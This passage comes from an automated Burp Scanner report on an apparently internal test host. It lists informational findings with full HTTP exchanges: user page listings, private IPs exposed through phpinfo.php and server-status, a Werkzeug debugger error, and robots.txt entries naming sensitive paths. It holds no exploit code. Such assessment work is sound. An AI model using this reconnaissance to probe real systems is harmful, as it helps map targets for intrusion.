Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:22:14 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1339
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>ricca.gilud -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.10.36. http://10.250.200.5:81/user/ricca.gilud/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/

Request 1

GET /user/ricca.gilud/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1339
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>ricca.gilud -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.10.37. http://10.250.200.5:81/user/ricca.gilud/key.asc
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/key.asc

Request 1

GET /user/ricca.gilud/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:48 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key 9D4BB115 not found on keyserver<br/>
3.10.38. http://10.250.200.5:81/user/ricca.gilud/me.jpg
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/me.jpg

Request 1

GET /user/ricca.gilud/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.39. http://10.250.200.5:81/user/stephi.fonda
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda

Request 1

GET /user/stephi.fonda HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:31:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1399
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>stephi.fonda -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.10.40. http://10.250.200.5:81/user/stephi.fonda/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/

Request 1

GET /user/stephi.fonda/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:24:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>stephi.fonda -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.10.41. http://10.250.200.5:81/user/stephi.fonda/key.asc
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/key.asc

Request 1

GET /user/stephi.fonda/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:28:35 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key 33E301FC not found on keyserver<br/>
3.10.42. http://10.250.200.5:81/user/stephi.fonda/me.jpg
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/me.jpg

Request 1

GET /user/stephi.fonda/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.43. http://10.250.200.5:8080/login
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /login

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
X-XSS-Protection: 0
Connection: close
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:34 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>KeyError: 'userNone_username' // Werkzeug Debugger</title>
<link
...[SNIP]...
3.11. Private IP addresses disclosed
Previous  Next

There are 4 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organization, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organization can help an attacker in carrying out network-layer attacks aiming to penetrate the organization's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organization's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.



3.11.1. http://10.250.200.5:81/phpinfo.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /phpinfo.php

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request 1

GET /phpinfo.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:06 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">172.18.0.6:80 </td>
...[SNIP]...
<td class="v">172.18.0.6 </td>
...[SNIP]...
<td class="v">10.250.100.116 </td>
...[SNIP]...
<td class="v">172.18.0.6</td>
...[SNIP]...
<td class="v">10.250.100.116</td>
...[SNIP]...
3.11.2. http://10.250.200.5:81/phpinfo.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /phpinfo.php/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request 1

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">172.18.0.6:80 </td>
...[SNIP]...
<td class="v">172.18.0.6 </td>
...[SNIP]...
<td class="v">10.250.100.116 </td>
...[SNIP]...
<td class="v">172.18.0.6</td>
...[SNIP]...
<td class="v">10.250.100.116</td>
...[SNIP]...
3.11.3. http://10.250.200.5:81/server-status
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /server-status

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request 1

GET /server-status HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:51:37 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7411
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>

<dl><dt>Server Version:
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
3.11.4. http://10.250.200.5:81/server-status/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /server-status/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request 1

GET /server-status/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:02 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7404
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>

<dl><dt>Server Version:
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
3.12. Robots.txt file
Previous

There are 2 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site that robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honor the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorized access.



3.12.1. http://10.250.200.5/robots.txt
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /robots.txt

Issue detail

The web server contains a robots.txt file.

Request 1

GET /robots.txt HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:45:32 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
Content-Length: 67
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
3.12.2. http://10.250.200.5:81/robots.txt
Previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /robots.txt

Issue detail

The web server contains a robots.txt file.

Request 1

GET /robots.txt HTTP/1.1
Host: 10.250.200.5
Connection: close

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:47:26 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 190
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /user/
Disallow: /search
Disallow: /config.php
Disallow: /phpinfo.php
Disallow: /session.php
Disallow: /sys-test.php
Disallow: /sys2_test.php
Disallow: /server-status

Report generated by Burp Scanner v1.7.13, at Wed Nov 08 13:46:47 CET 2017.